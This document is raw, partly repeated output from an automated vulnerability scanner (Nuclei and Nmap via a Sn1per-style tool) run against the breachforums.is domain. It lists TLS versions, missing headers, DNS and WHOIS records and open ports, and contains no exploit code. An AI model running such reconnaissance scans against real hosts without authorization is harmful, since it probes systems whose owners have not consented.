P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [noc@cloudflare.com,abuse@flokinet.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], https://breachforums.is:443/                     
P5 - INFO, Nuclei Vulnerability Scan, [ssl-issuer], breachforums.is:443 [Google Trust Services LLC]                 
P5 - INFO, Nuclei Vulnerability Scan, [ssl-dns-names], breachforums.is:443 [breachforums.is,*.breachforums.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [deprecated-tls], breachforums.is:443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [deprecated-tls], breachforums.is:443 [tls11]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls11]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls12]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls13]                    
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [google-floc-disabled], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], https://breachforums.is:8443/                     
P5 - INFO, Nuclei Vulnerability Scan, [ssl-issuer], breachforums.is:8443 [Google Trust Services LLC]                 
P5 - INFO, Nuclei Vulnerability Scan, [ssl-dns-names], breachforums.is:8443 [breachforums.is,*.breachforums.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:8443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:8443 [tls12]                    
====================================================================================•x[2023-09-17](21:29)x•
 RUNNING SC0PE NETWORK VULNERABILITY SCAN 
====================================================================================•x[2023-09-17](21:29)x•
P5 - INFO, Interesting Ports Found, breachforums.is, 8080 
====================================================================================•x[2023-09-17](21:29)x•
====================================================================================•x[2023-09-17](21:29)x•
====================================================================================
•?((¯°·..• Sc0pe Vulnerability Report by @xer0dayz •._.·°¯))؟• 
====================================================================================
Critical: 0
High: 0
Medium: 0
Low: 2
Info: 73
Score: 77
====================================================================================
P4 - LOW, Nuclei Vulnerability Scan, [weak-cipher-suites:tls-1.0], breachforums.is:443 [[tls10 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA]]                   
P4 - LOW, Strict Tranposrt Security Not Enforced, https://breachforums.is:8443//, 
P5 - INFO, Interesting Ports Found, breachforums.is, 8080 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], http://breachforums.is:80/                     
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], http://breachforums.is:8080                     
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [google-floc-disabled], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [noc@cloudflare.com,abuse@flokinet.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], https://breachforums.is:443/                     
P5 - INFO, Nuclei Vulnerability Scan, [ssl-issuer], breachforums.is:443 [Google Trust Services LLC]                 
P5 - INFO, Nuclei Vulnerability Scan, [ssl-dns-names], breachforums.is:443 [breachforums.is,*.breachforums.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [deprecated-tls], breachforums.is:443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [deprecated-tls], breachforums.is:443 [tls11]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls11]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls12]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:443 [tls13]                    
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [google-floc-disabled], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is:8443                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], https://breachforums.is:8443/                     
P5 - INFO, Nuclei Vulnerability Scan, [ssl-issuer], breachforums.is:8443 [Google Trust Services LLC]                 
P5 - INFO, Nuclei Vulnerability Scan, [ssl-dns-names], breachforums.is:8443 [breachforums.is,*.breachforums.is]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:8443 [tls10]                    
P5 - INFO, Nuclei Vulnerability Scan, [tls-version], breachforums.is:8443 [tls12]                    
P5 - INFO, Robots.txt Detected,http://breachforums.is:80/robots.txt,Sitemap: https://breachforums.is/sitemap-index.xml
P5 - INFO, Robots.txt Detected,http://breachforums.is:8080/robots.txt,Sitemap: https://breachforums.is/sitemap-index.xml
P5 - INFO, Server Header Disclosure - HTTP, http://breachforums.is:8080//, Server: cloudflare
P5 - INFO, Robots.txt Detected,https://breachforums.is:443/robots.txt,Sitemap: https://breachforums.is/sitemap-index.xml
P5 - INFO, Server Header Disclosure - HTTPS, https://breachforums.is:8443//, server: cloudflare
====================================================================================
====================================================================================•x[2023-09-17](21:29)x•
 SCAN COMPLETE! 
====================================================================================•x[2023-09-17](21:29)x•
 + -- --=[ Done!
====================================================================================•x[2023-09-17](21:29)x•
 RUNNING SC0PE NETWORK VULNERABILITY SCAN 
====================================================================================•x[2023-09-17](21:29)x•
P5 - INFO, Interesting Ports Found, breachforums.is, 8080 
====================================================================================•x[2023-09-17](21:29)x•
====================================================================================•x[2023-09-17](21:29)x•
 PERFORMING TCP PORT SCAN 
====================================================================================•x[2023-09-17](21:29)x•
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 21:29 PDT
Nmap scan report for breachforums.is (104.22.50.133)
Host is up (0.090s latency).
Other addresses for breachforums.is (not scanned): 172.67.5.22 104.22.51.133 2606:4700:10::ac43:516 2606:4700:10::6816:3385 2606:4700:10::6816:3285
Not shown: 65522 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE         SERVICE
80/tcp   open          http
443/tcp  open          https
2052/tcp open          clearvisn
2053/tcp open          knetd
2082/tcp open          infowave
2083/tcp open          radsec
2086/tcp open          gnunet
2087/tcp open          eli
2095/tcp open          nbx-ser
2096/tcp open          nbx-dir
8080/tcp open          http-proxy
8443/tcp open          https-alt
8880/tcp open          cddbp-alt
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
88/udp   open|filtered kerberos-sec
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
500/udp  open|filtered isakmp
520/udp  open|filtered route
2049/udp open|filtered nfs

Nmap done: 1 IP address (1 host up) scanned in 591.60 seconds
 + -- --=[ AUTO_BRUTE setting disabled in sniper.conf... skipping.
====================================================================================
•?((¯°·..• Sc0pe Vulnerability Report by @xer0dayz •._.·°¯))؟• 
====================================================================================
Critical: 0
High: 0
Medium: 0
Low: 2
Info: 73
Score: 77
====================================================================================
P4 - LOW, Nuclei Vulnerability Scan, [weak-cipher-suites:tls-1.0], breachforums.is:443 [[tls10 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA]]                   
P4 - LOW, Strict Tranposrt Security Not Enforced, https://breachforums.is:8443//, 
P5 - INFO, Interesting Ports Found, breachforums.is, 8080 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is/                     
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:raw], https://rdap.isnic.is/rdap/domain/breachforums.is [{"entities":[{"events":[{"eventAction":"registration","eventDate":"2019-01-30T17:27:47"},{"eventAction":"last changed","eventActor":"FL221-IS","eventDate":"2022-04-13T16:51:09"}],"handle":"FL221-IS","isnic_info":{"cc":"RO"},"objectClassName":"entity","roles":["registrant","administrative","billing","technical"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","Sos. Berceni Nr 96, Bl. A, Etaj 16,\r\nApartment 16.06","Bucharest","Bucharest","041918","Romania"]],["email",{},"text","abuse@flokinet.is"],["fn",{},"text","FlokiNET Ltd"],["tel",{"type":["voice"]},"uri","tel:+358-9-42458241"]]]},{"events":[{"eventAction":"registration","eventDate":"2012-01-19T19:38:09"},{"eventAction":"last changed","eventActor":"CN25-IS","eventDate":"2023-01-19T08:16:54"}],"handle":"CN25-IS","isnic_info":{"cc":"US"},"objectClassName":"entity","roles":["zone"],"status":["active","removed"],"vcardArray":["vcard",[["version",{},"text","4.0"],["kind",{},"text","role"],["adr",{},"text",["","","665 3rd Street, Suite 207","San Francisco","CA","94107","United States"]],["email",{},"text","noc@cloudflare.com"],["fn",{},"text","CloudFlare NOC"],["tel",{"type":["voice"]},"uri","tel:+1-650-319-8930"]]]}],"events":[{"eventAction":"registration","eventDate":"2023-07-21T07:55:01+00:00"},{"eventAction":"last changed","eventDate":"2023-07-21T10:15:01"},{"eventAction":"soft expiration","eventDate":"2024-07-21T00:00:00+00:00"}],"handle":"breachforums.is-226128","ldhName":"breachforums.is","nameservers":[{"ldhName":"luciana.ns.cloudflare.com","objectClassName":"nameserver"},{"ldhName":"yevgen.ns.cloudflare.com","objectClassName":"nameserver"}],"notices":[{"description":["Restricted
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:email], https://rdap.isnic.is/rdap/domain/breachforums.is [abuse@flokinet.is,noc@cloudflare.com]                    
P5 - INFO, Nuclei Vulnerability Scan, [rdap-whois:secureDNS], https://rdap.isnic.is/rdap/domain/breachforums.is [false]                    
P5 - INFO, Nuclei Vulnerability Scan, [waf-detect:cloudflare], http://breachforums.is:80/                     
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], http://breachforums.is:8080                     
P5 - INFO, Nuclei Vulnerability Scan, [dmarc-detect], _dmarc.breachforums.is ["v=DMARC1; p=reject; rua=mailto:dmarc@breachforums.is; fo=1"]                 
P5 - INFO, Nuclei Vulnerability Scan, [dns-saas-service-detection:cloudflare-cdn], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [mx-fingerprint], breachforums.is [10 mail.breachforums.is.]                   
P5 - INFO, Nuclei Vulnerability Scan, [txt-fingerprint], breachforums.is ["google-site-verification=iX57Y5bsmC1PMTY1DAucMp211mZnPCtJJ07rkJz2_UY","v=spf1 mx a:mail.breachforums.is -all"]                 
P5 - INFO, Nuclei Vulnerability Scan, [nameserver-fingerprint], breachforums.is [luciana.ns.cloudflare.com.,yevgen.ns.cloudflare.com.]                    
P5 - INFO, Nuclei Vulnerability Scan, [dns-waf-detect:cloudflare], breachforums.is                     
P5 - INFO, Nuclei Vulnerability Scan, [google-floc-disabled], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [tech-detect:cloudflare], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:strict-transport-security], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:content-security-policy], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-content-type-options], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:x-permitted-cross-domain-policies], https://breachforums.is:443                     
P5 - INFO, Nuclei Vulnerability Scan, [http-missing-security-headers:clear-site-data], https://breachforums.is:443                     
